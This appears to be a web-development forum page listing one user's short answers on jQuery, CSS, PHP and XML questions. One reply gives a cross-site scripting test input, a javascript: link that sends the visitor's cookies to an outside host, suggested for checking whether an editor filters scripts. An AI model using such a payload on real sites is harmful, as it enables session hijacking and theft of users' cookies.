430 Posted Topics

Member Avatar for ivan3510
Member Avatar for deepak777

Some notes: post is not a valid attribute. If the button and h1 share a parent or "ancestor", you can use siblings() or closest() and find() to find the h1. Otherwise, you can use html5 and data-post instead. Furthermore, h1s don't have a value, use html() or text() instead.

Member Avatar for twiss
0
53
Member Avatar for agam360

If you have a server-side script that sets cookie headers, you can get the expiration date of the cookies that are set on that page, with an XMLHttpRequest, but you have to actually 'execute' that page. Otherwise, nothing I can think of.

Member Avatar for twiss
0
173
Member Avatar for theMediator

What exactly do you want to remove the border of? In what browser do you see this border? Do you mean the .glossymenu? It's not a table, and the borders are hardcoded in the CSS.

Member Avatar for WigglesMcMuffin
0
124
Member Avatar for sallecpt
Member Avatar for thijscream
Member Avatar for Graphix
0
117
Member Avatar for DarkVision

Are you sure there's something in $DATERELEASE? And are you sure it's AllRelease, without an s?

Member Avatar for DarkVision
0
154
Member Avatar for khaleel_rashid

[url]http://www.ilovecolors.com.ar/how-to-add-a-color-picker-to-your-wordpress-plugin-or-theme/[/url]

Member Avatar for khaleel_rashid
0
107
Member Avatar for Loopster

What you could do is start with [code=CSS] background-size:cover; -moz-background-size:cover; [/code] and then find a workaround for IE <= 8.

Member Avatar for twiss
0
98
Member Avatar for Sogo7
Member Avatar for soft_coder
Member Avatar for ashley2011

What did you try? For the css, you'll need something like [code]#cssdropdown li > ul[/code]. For IE6, you'll also need to change the javascript a bit.

Member Avatar for twiss
0
55
Member Avatar for dd2308

Silverlight is running client-side, so you don't need a special server for it. PHP is server-side, so they can live together happily (just like PHP and flash, for example).

Member Avatar for dd2308
0
174
Member Avatar for Stefano Mtangoo

They *should* not allow inserting javascript, but always, try your best at inserting things like [code=html] <a href="javascript:location='www.somesite.com?cookies='+document.cookie">nice stuff!!</a> [/code] if this ends up in your site, and the editor didn't block it, something is wrong.

Member Avatar for Stefano Mtangoo
0
153
Member Avatar for Tony Smith

Something like this: [code=Javascript] function(input, link) { input.onkeyup = function() { link.href = 'http://thispage.com/cars/' + input.value; }; }(document.getElementById('input_id'), document.getElementById('link_id')); [/code] Oops, didn't read your post carefully. Changed it slightly.

Member Avatar for diafol
0
240
Member Avatar for raghujosh
Member Avatar for twiss
0
193
Member Avatar for roachae

There are many methods for this, but many recommend [url]http://code.google.com/p/swfobject/[/url].

Member Avatar for twiss
0
437
Member Avatar for abhi10kumar
Member Avatar for twiss
0
123
Member Avatar for abhi10kumar
Member Avatar for twiss
0
379
Member Avatar for loopylou8
Member Avatar for twiss
0
98
Member Avatar for SgtMash
Member Avatar for doctorphp

What is in solve_error.php? Does it work if you put something like [icode]exit('hello');[/icode] on the top of that page? jQuery is very good at hiding errors.

Member Avatar for doctorphp
0
124
Member Avatar for freshfitz

Take a look at [url]http://www.php.net/manual/en/array.sorting.php[/url] and, probably, [url]http://www.php.net/manual/en/function.usort.php[/url].

Member Avatar for twiss
0
1K
Member Avatar for Ghekko
Member Avatar for raghujosh

If you are guaranteed that the string is [icode]colors<select><option value = 'blue'></option></select>[/icode] and nothing comes after that, you can just use [code]substr($var1, strlen($result_string1));[/code] but if you're not, just add 1: [code]substr($var1, strlen($result_string1), strpos($var1, $needle3) + 1);[/code]

Member Avatar for twiss
0
436
Member Avatar for iwishimgoodasu

What kind of website would you like to make? That's most important, IMHO.

Member Avatar for dereksy
0
146
Member Avatar for maxlipman

You'll need to think of a way that you can allow that email address to change the pass, probably some long random key that you store encrypted.

Member Avatar for Ezzaral
0
338
Member Avatar for whiteyoh

I think you'll want to store the array's, for example: [code] <?php session_start(); ob_start(); if(isset($_SESSION['data'])) $data = $_SESSION['data']; else { include 'dbconnect.php'; $sql = "SELECT * FROM accounts a, callhistory c JOIN callhistory ON a.client_id = c.crm_reference WHERE date(c.timestamp_dtm) = '2011-05-17' ORDER BY c.timestamp_dtm DESC"; $q = mysql_query($SQL); while($row = …

Member Avatar for twiss
0
107
Member Avatar for whiteyoh

As I understand it, you want to count the amount of males? The easiest way (I think) is something like this: [CODE] $males = 0; while($result = mysql_fetch_array($query)) { $resultSet[] = $result; if($result['sex'] == 'male') $males++; } [/CODE]

Member Avatar for twiss
0
124
Member Avatar for kadriirdak

For small xml files, [url=http://www.php.net/manual/en/book.simplexml.php]SimpleXML[/url] is nice, but in php, there are quite a few ways to parse xml, as you can read [url=http://stackoverflow.com/questions/1706042/how-to-parse-xml-file-in-php]here[/url].

Member Avatar for kadriirdak
0
6K
Member Avatar for PHPExperts
Member Avatar for twiss
0
78
Member Avatar for Nybuler
Member Avatar for Joshua Kidd

I'm not really sure what's in $xml, but you'll need to put something in the value attribute, some id or that name. Then get the data that matches that.

Member Avatar for twiss
0
232
Member Avatar for manish250

I think you'll want to refacture that a bit. As a start, I would write two functions: one for disabling something, and one for enabling something. Also, don't put the handlers in the html, and note that if you want to change the selected option in a select element, you …

Member Avatar for twiss
0
229
Member Avatar for maii_18
Member Avatar for Joshua Kidd

It depends, but generally, you can put it in a for loop: [CODE] for($i = 0; $i < 5; $i++) {?> <td>bla, bla</td> <?php } [/CODE]

Member Avatar for twiss
0
72
Member Avatar for manu555
Member Avatar for nibbler
Member Avatar for Arbus

You need to move the 2 up :) Another one. It's my favorite puzzle. Is there a sequence of valid moves in chess that leads to the following (explain): [img]http://twiss.nl/chess.png[/img]

Member Avatar for twiss
0
188
Member Avatar for umair.sabri

Don't post a question twice, it doesn't help. Anyway, you're still not giving enough information. ActiveTabIndex implies an int that indicates the active tab (0 for the first, 1 for the second, ...).

Member Avatar for twiss
0
136
Member Avatar for maxelcat
Member Avatar for pcmaster
0
124
Member Avatar for jacksantho

What is $g? Probably an object ("object of class variant"). You'll need to think of what you actually want to know. Also, don't die if you can't delete a file. You die anyway, and you already know your file exists.

Member Avatar for twiss
0
361
Member Avatar for khr2003
Member Avatar for Ritesh_4

Generally, just put them in nested [icode]ul[/icode]'s: [CODE=html] <ul> <li><a>Something</a></li> <li> <ul> <li><a>Something else..</a></li> <li> <ul> ... </ul> </li> </ul> </li> </ul> [/CODE] By the way, this is HTML, not javascript.

Member Avatar for Ritesh_4
0
142
Member Avatar for Joshua Kidd

That's not an error, it's a notice. You can turn off displaying them by calling [icode]error_reporting(0);[/icode], for example. This notice means, that $_POST does not contain anything for the index 'submit'. Don't worry about it.

Member Avatar for Joshua Kidd
0
107
Member Avatar for diafol

Perhaps it's easier to replace => with = in the first one and include it or them (in the correct order)?

Member Avatar for diafol
0
160
Member Avatar for ankit.4aug
Member Avatar for twiss
0
111
Member Avatar for cutexxbaby
Member Avatar for gogreen1

Just try, it's easy. Start at [url]http://cufon.shoqolate.com/generate/[/url].

Member Avatar for twiss
0
59
Member Avatar for Ritesh_4

[url]lmddgtfy.com/?q=marquee+jquery[/url], for example [url]http://remysharp.com/2008/09/10/the-silky-smooth-marquee/[/url]

Member Avatar for gogreen1
0
84

The End.